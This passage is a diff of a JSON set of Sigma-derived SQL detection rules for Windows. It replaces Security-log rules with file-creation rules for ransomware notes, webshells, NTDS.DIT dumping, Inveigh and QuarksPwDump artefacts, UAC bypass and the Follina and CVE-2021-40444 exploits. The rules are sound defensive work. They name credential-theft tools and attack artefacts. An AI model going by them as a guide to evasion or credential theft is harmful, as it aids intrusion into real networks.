"80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND 
TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely 
and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND 
NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], 
"falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via 
dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign 
of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = 
'5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND 
TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", 
- "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": 
"Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine 
Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on 
Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + 
"filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE 